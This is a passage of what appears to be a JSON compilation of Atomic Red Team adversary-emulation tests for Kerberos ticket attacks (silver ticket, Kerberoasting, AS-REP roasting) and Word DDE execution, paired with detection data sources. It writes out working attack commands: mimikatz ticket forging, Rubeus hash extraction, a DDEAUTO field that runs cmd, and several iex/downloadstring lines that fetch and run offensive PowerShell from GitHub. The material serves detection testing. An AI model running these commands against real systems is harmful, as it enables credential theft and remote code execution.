attack\ndo {\n Start-Sleep 1 # wait a bit so the output file has time to be created\n Get-Content -Path \"$env:TEMP\\silver.txt\" -Wait | ForEach-Object {\n if ($_ -match 'End of Silver Ticket attack') { break } \n }\n} while ($false) # dummy loop so that 'break' can be used\n\n# show output from new empty session\nGet-Content $env:TEMP\\silver.txt\n\n# cleanup temp files\nRemove-Item $env:TEMP\\silver.bat -ErrorAction Ignore\nRemove-Item $env:TEMP\\silver.txt -ErrorAction Ignore\n", + "source": "atomics/T1558.002/T1558.002.yaml", + "name": "Atomic Red Team Test - Steal or Forge Kerberos Tickets: Silver Ticket" + }, + { + "command": "Remove-Item $env:TEMP\\silver.bat -ErrorAction Ignore\nRemove-Item $env:TEMP\\silver.txt -ErrorAction Ignore\n\n# get current domain SID if default was used\n$domain_sid = \"#{domain_sid}\"\nIf ($domain_sid -Match \"DEFAULT\") {\n # code from https://www.sevecek.com/EnglishPages/Lists/Posts/Post.aspx?ID=60\n $domain = gwmi Win32_ComputerSystem | Select -Expand Domain\n $krbtgtSID = (New-Object Security.Principal.NTAccount $domain\\krbtgt).Translate([Security.Principal.SecurityIdentifier]).Value\n $domain_sid = $krbtgtSID.SubString(0, $krbtgtSID.LastIndexOf('-'))\n}\n\n# create batch file with commands to run in a separate \"runas /netonly\" session\n# so we don't purge Kerberos ticket from the current Windows session\n# its output goes to silver.txt temp file, because we cannot capture \"runas /netonly\" output otherwise\n@\"\n>%TEMP%\\silver.txt 2>&1 (\n echo Purge existing tickets and create silver ticket:\n klist purge\n $env:TEMP\\mimikatz\\x64\\mimikatz.exe \"kerberos::golden /domain:#{domain} /sid:DOMAIN_SID /aes256:#{service_aes256_key} /user:#{account} /service:HOST /target:#{target}.#{domain} /ptt\" \"exit\"\n\n echo.\n echo executing:schtasks /query /S #{target}.#{domain}\n schtasks /query /S #{target}.#{domain}\n \n echo.\n echo Tickets after requesting schtasks:\n klist\n\n echo.\n echo End of Silver Ticket attack\n)\n\"@ -Replace \"DOMAIN_SID\", $domain_sid | Out-File -Encoding OEM $env:TEMP\\silver.bat\n\n# run batch file in a new empty session (password and username do not matter)\necho \"foo\" | runas /netonly /user:fake \"$env:TEMP\\silver.bat\" | Out-Null\n\n# wait until the output file has logged the entire attack\ndo {\n Start-Sleep 1 # wait a bit so the output file has time to be created\n Get-Content -Path \"$env:TEMP\\silver.txt\" -Wait | ForEach-Object {\n if ($_ -match 'End of Silver Ticket attack') { break } \n }\n} while ($false) # dummy loop so that 'break' can be used\n\n# show output from new empty session\nGet-Content $env:TEMP\\silver.txt\n\n# cleanup temp files\nRemove-Item $env:TEMP\\silver.bat -ErrorAction Ignore\nRemove-Item $env:TEMP\\silver.txt -ErrorAction Ignore\n", + "source": "atomics/T1558.002/T1558.002.yaml", + "name": "Atomic Red Team Test - Steal or Forge Kerberos Tickets: Silver Ticket" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1558.002", + "display_name": "Steal or Forge Kerberos Tickets: Silver Ticket", + "atomic_tests": [ + { + "name": "Crafting Active Directory silver tickets with mimikatz", + "auto_generated_guid": "385e59aa-113e-4711-84d9-f637aef01f2c", + "description": "Once the hash of service account is retrieved it is possible to forge Kerberos ticket granting service (TGS) tickets, also known as silver tickets.\nThe generated ticket is injected in a new empty Windows session and discarded after, so it does not pollute the current Windows session.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "domain_sid": { + "description": "SID of the targeted domain, if you keep default it will automatically get the current domain SID", + "type": "String", + "default": "S-1-5-21-DEFAULT" + }, + "domain": { + "description": "Targeted Active Directory domain FQDN", + "type": "String", + "default": "%userdnsdomain%" + }, + "account": { + "description": "Account to impersonate", + "type": "String", + "default": "silverticketfakeuser" + }, + "target": { + "description": "System you want to target (Default will be logon server)", + "type": "String", + "default": "%logonserver:\\\\=%" + }, + "service_aes256_key": { + "description": "AES256 key (you will need to set to match your service key for your target)", + "type": "String", + "default": "b7268361386090314acce8d9367e55f55865e7ef8e670fbe4262d6c94098a9e9" + }, + "mimikatz_path": { + "description": "Mimikatz windows executable", + "type": "Path", + "default": "$env:TEMP\\mimikatz\\x64\\mimikatz.exe" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Mimikatz executor must exist on disk and at specified location (#{mimikatz_path})\n", + "prereq_command": "$mimikatz_path = cmd /c echo #{mimikatz_path}\nif (Test-Path $mimikatz_path) {exit 0} else {exit 1}\n", + "get_prereq_command": "$mimikatz_path = cmd /c echo #{mimikatz_path}\n$mimikatz_relative_uri = Invoke-WebRequest \"https://github.com/gentilkiwi/mimikatz/releases/latest\" -UseBasicParsing | Select-Object -ExpandProperty Links | Where-Object -Property href -Like \"*/mimikatz_trunk.zip\" | Select-Object -ExpandProperty href\nInvoke-WebRequest \"https://github.com$mimikatz_relative_uri\" -UseBasicParsing -OutFile \"$env:TEMP\\mimikatz.zip\"\nExpand-Archive $env:TEMP\\mimikatz.zip $env:TEMP\\mimikatz -Force\nNew-Item -ItemType Directory (Split-Path $mimikatz_path) -Force | Out-Null\nMove-Item $env:TEMP\\mimikatz\\x64\\mimikatz.exe $mimikatz_path -Force\n" + } + ], + "executor": { + "name": "powershell", + "elevation_required": false, + "command": "Remove-Item $env:TEMP\\silver.bat -ErrorAction Ignore\nRemove-Item $env:TEMP\\silver.txt -ErrorAction Ignore\n\n# get current domain SID if default was used\n$domain_sid = \"#{domain_sid}\"\nIf ($domain_sid -Match \"DEFAULT\") {\n # code from https://www.sevecek.com/EnglishPages/Lists/Posts/Post.aspx?ID=60\n $domain = gwmi Win32_ComputerSystem | Select -Expand Domain\n $krbtgtSID = (New-Object Security.Principal.NTAccount $domain\\krbtgt).Translate([Security.Principal.SecurityIdentifier]).Value\n $domain_sid = $krbtgtSID.SubString(0, $krbtgtSID.LastIndexOf('-'))\n}\n\n# create batch file with commands to run in a separate \"runas /netonly\" session\n# so we don't purge Kerberos ticket from the current Windows session\n# its output goes to silver.txt temp file, because we cannot capture \"runas /netonly\" output otherwise\n@\"\n>%TEMP%\\silver.txt 2>&1 (\n echo Purge existing tickets and create silver ticket:\n klist purge\n #{mimikatz_path} \"kerberos::golden /domain:#{domain} /sid:DOMAIN_SID /aes256:#{service_aes256_key} /user:#{account} /service:HOST /target:#{target}.#{domain} /ptt\" \"exit\"\n\n echo.\n echo executing:schtasks /query /S #{target}.#{domain}\n schtasks /query /S #{target}.#{domain}\n \n echo.\n echo Tickets after requesting schtasks:\n klist\n\n echo.\n echo End of Silver Ticket attack\n)\n\"@ -Replace \"DOMAIN_SID\", $domain_sid | Out-File -Encoding OEM $env:TEMP\\silver.bat\n\n# run batch file in a new empty session (password and username do not matter)\necho \"foo\" | runas /netonly /user:fake \"$env:TEMP\\silver.bat\" | Out-Null\n\n# wait until the output file has logged the entire attack\ndo {\n Start-Sleep 1 # wait a bit so the output file has time to be created\n Get-Content -Path \"$env:TEMP\\silver.txt\" -Wait | ForEach-Object {\n if ($_ -match 'End of Silver Ticket attack') { break } \n }\n} while ($false) # dummy loop so that 'break' can be used\n\n# show output from new empty session\nGet-Content $env:TEMP\\silver.txt\n\n# cleanup temp files\nRemove-Item $env:TEMP\\silver.bat -ErrorAction Ignore\nRemove-Item $env:TEMP\\silver.txt -ErrorAction Ignore\n" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session metadata", + "description": "Data and information that describe a logon session (such as logon type) and activity within it.", + "source_data_element": "user", + "relationship": "retrieved information about", + "target_data_element": "logon session" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/basic-audit-logon-events" + ] + ] + }, + { + "technique_id": "T1558.003", + "command_list": [ + "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\niex(iwr https://raw.githubusercontent.com/EmpireProject/Empire/08cbd274bef78243d7a8ed6443b8364acd1fc48b/data/module_source/credentials/Invoke-Kerberoast.ps1 -UseBasicParsing)\nInvoke-Kerberoast | fl\n", + "klist purge\ncmd.exe /c \"$Env:temp\\#{local_executable}\" kerberoast #{flags} /outfile:\"$Env:temp\\#{out_file}\"\n", + "klist purge\ncmd.exe /c \"#{local_folder}\\rubeus.exe\" kerberoast #{flags} /outfile:\"#{local_folder}\\#{out_file}\"\n", + "klist purge\ncmd.exe /c \"#{local_folder}\\#{local_executable}\" kerberoast #{flags} /outfile:\"#{local_folder}\\rubeus_output.txt\"\n", + "klist purge\ncmd.exe /c \"#{local_folder}\\#{local_executable}\" kerberoast #{flags} /outfile:\"#{local_folder}\\#{out_file}\"\n", + null, + "setspn -T %USERDNSDOMAIN% -Q */*\n", + "Add-Type -AssemblyName System.IdentityModel\n$ComputerFQDN=$env:LogonServer.trimStart('\\') + \".\" + $env:UserDnsDomain\nNew-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList \"HTTP/$ComputerFQDN\" \n", + "Add-Type -AssemblyName System.IdentityModel \nsetspn.exe -T %USERDNSDOMAIN% -Q */* | Select-String '^CN' -Context 0,1 | % { New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $_.Context.PostContext[0].Trim() } \n", + "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nKerberoasting -consoleoutput -noninteractive", + "iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-Rubeus.ps1')\nInvoke-Rubeus -Command \"kerberoast /format:hashcat /nowrap\"" + ], + "commands": [ + { + "command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\niex(iwr https://raw.githubusercontent.com/EmpireProject/Empire/08cbd274bef78243d7a8ed6443b8364acd1fc48b/data/module_source/credentials/Invoke-Kerberoast.ps1 -UseBasicParsing)\nInvoke-Kerberoast | fl\n", + "source": "atomics/T1558.003/T1558.003.yaml", + "name": "Atomic Red Team Test - Steal or Forge Kerberos Tickets: Kerberoasting" + }, + { + "command": "klist purge\ncmd.exe /c \"$Env:temp\\#{local_executable}\" kerberoast #{flags} /outfile:\"$Env:temp\\#{out_file}\"\n", + "source": "atomics/T1558.003/T1558.003.yaml", + "name": "Atomic Red Team Test - Steal or Forge Kerberos Tickets: Kerberoasting" + }, + { + "command": "klist purge\ncmd.exe /c \"#{local_folder}\\rubeus.exe\" kerberoast #{flags} /outfile:\"#{local_folder}\\#{out_file}\"\n", + "source": "atomics/T1558.003/T1558.003.yaml", + "name": "Atomic Red Team Test - Steal or Forge Kerberos Tickets: Kerberoasting" + }, + { + "command": "klist purge\ncmd.exe /c \"#{local_folder}\\#{local_executable}\" kerberoast #{flags} /outfile:\"#{local_folder}\\rubeus_output.txt\"\n", + "source": "atomics/T1558.003/T1558.003.yaml", + "name": "Atomic Red Team Test - Steal or Forge Kerberos Tickets: Kerberoasting" + }, + { + "command": "klist purge\ncmd.exe /c \"#{local_folder}\\#{local_executable}\" kerberoast #{flags} /outfile:\"#{local_folder}\\#{out_file}\"\n", + "source": "atomics/T1558.003/T1558.003.yaml", + "name": "Atomic Red Team Test - Steal or Forge Kerberos Tickets: Kerberoasting" + }, + { + "command": null, + "source": "atomics/T1558.003/T1558.003.yaml", + "name": "Atomic Red Team Test - Steal or Forge Kerberos Tickets: Kerberoasting" + }, + { + "command": "setspn -T %USERDNSDOMAIN% -Q */*\n", + "source": "atomics/T1558.003/T1558.003.yaml", + "name": "Atomic Red Team Test - Steal or Forge Kerberos Tickets: Kerberoasting" + }, + { + "command": "Add-Type -AssemblyName System.IdentityModel\n$ComputerFQDN=$env:LogonServer.trimStart('\\') + \".\" + $env:UserDnsDomain\nNew-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList \"HTTP/$ComputerFQDN\" \n", + "source": "atomics/T1558.003/T1558.003.yaml", + "name": "Atomic Red Team Test - Steal or Forge Kerberos Tickets: Kerberoasting" + }, + { + "command": "Add-Type -AssemblyName System.IdentityModel \nsetspn.exe -T %USERDNSDOMAIN% -Q */* | Select-String '^CN' -Context 0,1 | % { New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $_.Context.PostContext[0].Trim() } \n", + "source": "atomics/T1558.003/T1558.003.yaml", + "name": "Atomic Red Team Test - Steal or Forge Kerberos Tickets: Kerberoasting" + }, + { + "command": "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nKerberoasting -consoleoutput -noninteractive", + "source": "atomics/T1558.003/T1558.003.yaml", + "name": "Atomic Red Team Test - Steal or Forge Kerberos Tickets: Kerberoasting" + }, + { + "command": "iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-Rubeus.ps1')\nInvoke-Rubeus -Command \"kerberoast /format:hashcat /nowrap\"", + "source": "atomics/T1558.003/T1558.003.yaml", + "name": "Atomic Red Team Test - Steal or Forge Kerberos Tickets: Kerberoasting" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1558.003", + "display_name": "Steal or Forge Kerberos Tickets: Kerberoasting", + "atomic_tests": [ + { + "name": "Request for service tickets", + "auto_generated_guid": "3f987809-3681-43c8-bcd8-b3ff3a28533a", + "description": "This test uses the Powershell Empire Module: Invoke-Kerberoast.ps1\nThe following are further sources and credits for this attack:\n[Kerberoasting Without Mimikatz source] (https://www.harmj0y.net/blog/powershell/kerberoasting-without-mimikatz/)\n[Invoke-Kerberoast source] (https://powersploit.readthedocs.io/en/latest/Recon/Invoke-Kerberoast/)\nwhen executed successfully , the test displays available services with their hashes. \nIf the testing domain doesn't have any service principal name configured, there is no output\n", + "supported_platforms": [ + "windows" + ], + "dependencies": [ + { + "description": "Computer must be domain joined\n", + "prereq_command": "if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1}\n", + "get_prereq_command": "Write-Host Joining this computer to a domain must be done manually\n" + } + ], + "executor": { + "command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\niex(iwr https://raw.githubusercontent.com/EmpireProject/Empire/08cbd274bef78243d7a8ed6443b8364acd1fc48b/data/module_source/credentials/Invoke-Kerberoast.ps1 -UseBasicParsing)\nInvoke-Kerberoast | fl\n", + "name": "powershell" + } + }, + { + "name": "Rubeus kerberoast", + "auto_generated_guid": "14625569-6def-4497-99ac-8e7817105b55", + "description": "Information on the Rubeus tool and it's creators found here: https://github.com/GhostPack/Rubeus#asreproast\nThis build targets .NET 4.5. If targeting a different version you will need to compile Rubeus\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "local_folder": { + "description": "Local path of Rubeus executable", + "type": "Path", + "default": "$Env:temp" + }, + "local_executable": { + "description": "name of the rubeus executable", + "type": "String", + "default": "rubeus.exe" + }, + "out_file": { + "description": "file where command results are stored", + "type": "String", + "default": "rubeus_output.txt" + }, + "rubeus_url": { + "description": "URL of Rubeus executable", + "type": "Url", + "default": "https://github.com/morgansec/Rubeus/raw/de21c6607e9a07182a2d2eea20bb67a22d3fbf95/Rubeus/bin/Debug/Rubeus45.exe" + }, + "flags": { + "description": "command flags you would like to run (optional and blank by default)", + "type": "String", + "default": null + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Computer must be domain joined\n", + "prereq_command": "if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1}\n", + "get_prereq_command": "Write-Host Joining this computer to a domain must be done manually\n" + }, + { + "description": "Rubeus must exist\n", + "prereq_command": "if(Test-Path -Path #{local_folder}\\#{local_executable}) {exit 0} else {exit 1}\n", + "get_prereq_command": "Invoke-Webrequest -Uri #{rubeus_url} -OutFile #{local_folder}\\#{local_executable}\n" + } + ], + "executor": { + "command": "klist purge\ncmd.exe /c \"#{local_folder}\\#{local_executable}\" kerberoast #{flags} /outfile:\"#{local_folder}\\#{out_file}\"\n", + "cleanup_command": "Remove-Item #{local_folder}\\#{out_file} -ErrorAction Ignore\n", + "name": "powershell", + "elevation_required": false + } + }, + { + "name": "Extract all accounts in use as SPN using setspn", + "auto_generated_guid": "e6f4affd-d826-4871-9a62-6c9004b8fe06", + "description": "The following test will utilize setspn to extract the Service Principal Names. This behavior is typically used during a kerberos or silver ticket attack. \nA successful execution will output all the SPNs for the related domain. \n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "domain_name": { + "description": "The Domain Name to lookup against", + "type": "String", + "default": "%USERDNSDOMAIN%" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Computer must be domain joined\n", + "prereq_command": "if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1}\n", + "get_prereq_command": "Write-Host Joining this computer to a domain must be done manually\n" + } + ], + "executor": { + "command": "setspn -T #{domain_name} -Q */*\n", + "name": "command_prompt" + } + }, + { + "name": "Request A Single Ticket via PowerShell", + "auto_generated_guid": "988539bc-2ed7-4e62-aec6-7c5cf6680863", + "description": "The following test will utilize native PowerShell Identity modules to query the domain to extract the Service Principal Names for a single computer. This behavior is typically used during a kerberos or silver ticket attack. \nA successful execution will output the SPNs for the endpoint in question.\n", + "supported_platforms": [ + "windows" + ], + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Computer must be domain joined\n", + "prereq_command": "if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1}\n", + "get_prereq_command": "Write-Host Joining this computer to a domain must be done manually\n" + } + ], + "executor": { + "command": "Add-Type -AssemblyName System.IdentityModel\n$ComputerFQDN=$env:LogonServer.trimStart('\\') + \".\" + $env:UserDnsDomain\nNew-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList \"HTTP/$ComputerFQDN\" \n", + "name": "powershell" + } + }, + { + "name": "Request All Tickets via PowerShell", + "auto_generated_guid": "902f4ed2-1aba-4133-90f2-cff6d299d6da", + "description": "The following test will utilize native PowerShell Identity modules to query the domain to extract allthe Service Principal Names. This behavior is typically used during a kerberos or silver ticket attack. \nA successful execution will output the SPNs for the domain in question.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "domain_name": { + "description": "The Domain Name to lookup against", + "type": "String", + "default": "%USERDNSDOMAIN%" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Computer must be domain joined\n", + "prereq_command": "if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1}\n", + "get_prereq_command": "Write-Host Joining this computer to a domain must be done manually\n" + } + ], + "executor": { + "command": "Add-Type -AssemblyName System.IdentityModel \nsetspn.exe -T #{domain_name} -Q */* | Select-String '^CN' -Context 0,1 | % { New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $_.Context.PostContext[0].Trim() } \n", + "name": "powershell" + } + }, + { + "name": "WinPwn - Kerberoasting", + "auto_generated_guid": "78d10e20-c874-45f2-a9df-6fea0120ec27", + "description": "Kerberoasting technique via function of WinPwn", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nKerberoasting -consoleoutput -noninteractive", + "name": "powershell" + } + }, + { + "name": "WinPwn - PowerSharpPack - Kerberoasting Using Rubeus", + "auto_generated_guid": "29094950-2c96-4cbd-b5e4-f7c65079678f", + "description": "PowerSharpPack - Kerberoasting Using Rubeus technique via function of WinPwn", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-Rubeus.ps1')\nInvoke-Rubeus -Command \"kerberoast /format:hashcat /nowrap\"", + "name": "powershell" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "active directory", + "definition": "Information associated with the Active Directory service or objects (Such as a user, a group, or a workstation) and activity around them.", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Azure AD" + ], + "data_component": "active directory credential request", + "description": "A user requested active directory credentials, such as a ticket or token.", + "source_data_element": "user", + "relationship": "requested", + "target_data_element": "ad credential" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/ad-ds-getting-started" + ] + ] + }, + { + "technique_id": "T1558.004", + "command_list": [ + "cmd.exe /c \"$Env:temp\\#{local_executable}\" asreproast /outfile:\"$Env:temp\\#{out_file}\"\n", + "cmd.exe /c \"#{local_folder}\\rubeus.exe\" asreproast /outfile:\"#{local_folder}\\#{out_file}\"\n", + "cmd.exe /c \"#{local_folder}\\#{local_executable}\" asreproast /outfile:\"#{local_folder}\\rubeus_output.txt\"\n", + "cmd.exe /c \"#{local_folder}\\#{local_executable}\" asreproast /outfile:\"#{local_folder}\\#{out_file}\"\n", + "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainUser -PreauthNotRequired -Properties distinguishedname -Verbose\n", + "iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-Rubeus.ps1')\nInvoke-Rubeus -Command \"asreproast /format:hashcat /nowrap\"" + ], + "commands": [ + { + "command": "cmd.exe /c \"$Env:temp\\#{local_executable}\" asreproast /outfile:\"$Env:temp\\#{out_file}\"\n", + "source": "atomics/T1558.004/T1558.004.yaml", + "name": "Atomic Red Team Test - Steal or Forge Kerberos Tickets: AS-REP Roasting" + }, + { + "command": "cmd.exe /c \"#{local_folder}\\rubeus.exe\" asreproast /outfile:\"#{local_folder}\\#{out_file}\"\n", + "source": "atomics/T1558.004/T1558.004.yaml", + "name": "Atomic Red Team Test - Steal or Forge Kerberos Tickets: AS-REP Roasting" + }, + { + "command": "cmd.exe /c \"#{local_folder}\\#{local_executable}\" asreproast /outfile:\"#{local_folder}\\rubeus_output.txt\"\n", + "source": "atomics/T1558.004/T1558.004.yaml", + "name": "Atomic Red Team Test - Steal or Forge Kerberos Tickets: AS-REP Roasting" + }, + { + "command": "cmd.exe /c \"#{local_folder}\\#{local_executable}\" asreproast /outfile:\"#{local_folder}\\#{out_file}\"\n", + "source": "atomics/T1558.004/T1558.004.yaml", + "name": "Atomic Red Team Test - Steal or Forge Kerberos Tickets: AS-REP Roasting" + }, + { + "command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainUser -PreauthNotRequired -Properties distinguishedname -Verbose\n", + "source": "atomics/T1558.004/T1558.004.yaml", + "name": "Atomic Red Team Test - Steal or Forge Kerberos Tickets: AS-REP Roasting" + }, + { + "command": "iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-Rubeus.ps1')\nInvoke-Rubeus -Command \"asreproast /format:hashcat /nowrap\"", + "source": "atomics/T1558.004/T1558.004.yaml", + "name": "Atomic Red Team Test - Steal or Forge Kerberos Tickets: AS-REP Roasting" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1558.004", + "display_name": "Steal or Forge Kerberos Tickets: AS-REP Roasting", + "atomic_tests": [ + { + "name": "Rubeus asreproast", + "auto_generated_guid": "615bd568-2859-41b5-9aed-61f6a88e48dd", + "description": "Information on the Rubeus tool and it's creators found here: https://github.com/GhostPack/Rubeus#asreproast\nThis build targets .NET 4.5. If targeting a different version you will need to compile Rubeus\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "local_folder": { + "description": "Local path of Rubeus executable", + "type": "Path", + "default": "$Env:temp" + }, + "local_executable": { + "description": "name of the rubeus executable", + "type": "String", + "default": "rubeus.exe" + }, + "out_file": { + "description": "file where command results are stored", + "type": "String", + "default": "rubeus_output.txt" + }, + "rubeus_url": { + "description": "URL of Rubeus executable", + "type": "Url", + "default": "https://github.com/morgansec/Rubeus/raw/de21c6607e9a07182a2d2eea20bb67a22d3fbf95/Rubeus/bin/Debug/Rubeus45.exe" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Computer must be domain joined\n", + "prereq_command": "if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1}\n", + "get_prereq_command": "Write-Host Joining this computer to a domain must be done manually\n" + }, + { + "description": "Rubeus must exist\n", + "prereq_command": "if(Test-Path -Path #{local_folder}\\#{local_executable}) {exit 0} else {exit 1}\n", + "get_prereq_command": "Invoke-Webrequest -Uri #{rubeus_url} -OutFile #{local_folder}\\#{local_executable}\n" + } + ], + "executor": { + "command": "cmd.exe /c \"#{local_folder}\\#{local_executable}\" asreproast /outfile:\"#{local_folder}\\#{out_file}\"\n", + "cleanup_command": "Remove-Item #{local_folder}\\#{out_file} -ErrorAction Ignore\n", + "name": "powershell", + "elevation_required": false + } + }, + { + "name": "Get-DomainUser with PowerView", + "auto_generated_guid": "d6139549-7b72-4e48-9ea1-324fc9bdf88a", + "description": "Utilizing PowerView, run Get-DomainUser to identify domain users. Upon execution, progress and info about users within the domain being scanned will be displayed.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainUser -PreauthNotRequired -Properties distinguishedname -Verbose\n", + "name": "powershell" + } + }, + { + "name": "WinPwn - PowerSharpPack - Kerberoasting Using Rubeus", + "auto_generated_guid": "8c385f88-4d47-4c9a-814d-93d9deec8c71", + "description": "PowerSharpPack - Kerberoasting Using Rubeus technique via function of WinPwn", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-Rubeus.ps1')\nInvoke-Rubeus -Command \"asreproast /format:hashcat /nowrap\"", + "name": "powershell" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "active directory", + "definition": "Information associated with the Active Directory service or objects (Such as a user, a group, or a workstation) and activity around them.", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Azure AD" + ], + "data_component": "active directory credential request", + "description": "A user requested active directory credentials, such as a ticket or token.", + "source_data_element": "user", + "relationship": "requested", + "target_data_element": "ad credential" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/ad-ds-getting-started" + ] + ] + }, + { + "technique_id": "T1559.002", + "command_list": [ + "start $PathToAtomicsFolder\\T1559.002\\bin\\DDE_Document.docx\n" + ], + "commands": [ + { + "command": "start $PathToAtomicsFolder\\T1559.002\\bin\\DDE_Document.docx\n", + "source": "atomics/T1559.002/T1559.002.yaml", + "name": "Atomic Red Team Test - Inter-Process Communication: Dynamic Data Exchange" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1559.002", + "display_name": "Inter-Process Communication: Dynamic Data Exchange", + "atomic_tests": [ + { + "name": "Execute Commands", + "auto_generated_guid": "f592ba2a-e9e8-4d62-a459-ef63abd819fd", + "description": "Executes commands via DDE using Microsfot Word\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "steps": "Open Microsoft Word\n\nInsert tab -> Quick Parts -> Field\n\nChoose = (Formula) and click ok.\n\nAfter that, you should see a Field inserted in the document with an error \"!Unexpected End of Formula\", right-click the Field, and choose Toggle Field Codes.\n\nThe Field Code should now be displayed, change it to Contain the following:\n\n{DDEAUTO c:\\\\windows\\\\system32\\\\cmd.exe \"/k calc.exe\" }\n", + "name": "manual" + } + }, + { + "name": "Execute PowerShell script via Word DDE", + "auto_generated_guid": "47c21fb6-085e-4b0d-b4d2-26d72c3830b3", + "description": "When the word document opens it will prompt the user to click ok on a dialogue box, then attempt to run PowerShell with DDEAUTO to download and execute a powershell script\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "start $PathToAtomicsFolder\\T1559.002\\bin\\DDE_Document.docx\n", + "name": "command_prompt" + } + }, + { + "name": "DDEAUTO", + "auto_generated_guid": "cf91174c-4e74-414e-bec0-8d60a104d181", + "description": "\nTrustedSec - Unicorn - https://github.com/trustedsec/unicorn\n\nSensePost DDEAUTO - https://sensepost.com/blog/2017/macro-less-code-exec-in-msword/\n\nWord VBA 